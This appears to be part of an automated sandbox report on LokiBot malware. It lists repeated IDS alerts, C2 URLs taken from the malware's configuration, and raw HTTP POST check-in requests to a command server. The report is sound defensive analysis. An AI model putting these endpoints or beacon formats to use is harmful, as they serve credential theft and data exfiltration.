Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59186 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59186 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59131 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59181 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49713 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59186 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59142 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59142 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59142 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59161
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59142 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49793
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49766
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59086
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49805 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49805 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59071
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59227 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59181
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59227 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59227 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59081
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49805 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59227 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59102 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59102 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59102 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49805 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59102 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59186
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59136
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59091
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59256 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59256 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59256 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59237 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59055
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59221 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59221 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59221 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59237 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59237 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59231 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49805
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59221 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59231 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59256 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59237 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59231 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59121
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59191 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59191 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59191 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59156 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59096 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59096 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59096 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:49790
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59191 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59102
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59096 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59231 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59167 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59167 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59167 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59167 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59176 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59176 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59176 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59111 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59111 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59066 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59111 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59066 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59066 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59240 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59240 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59066 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59111 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59240 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59212 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59240 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59156 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59156 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59176 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59131
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59156 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59111
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59251 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59240
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59167
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59246 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59251 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59251 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59066
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59246 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59251 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59246 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59246 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59142
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59116 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59116 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59116 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59202 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59202 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59116 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59212 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59212 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59212 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59127 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59127 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59127 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59251
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59127 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59202 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59171 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59171 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59202 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59231
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59171 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59171 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59127
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59202
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59206 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59206 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59206 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59206 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59171
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59216 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59216 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59216 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59216 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.16.1:80 -> 192.168.2.6:59216
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:59196 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:59196 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:59196 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:59196 -> 104.21.16.1:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.16.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: global traffic

TCP traffic: 192.168.2.6:59045 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
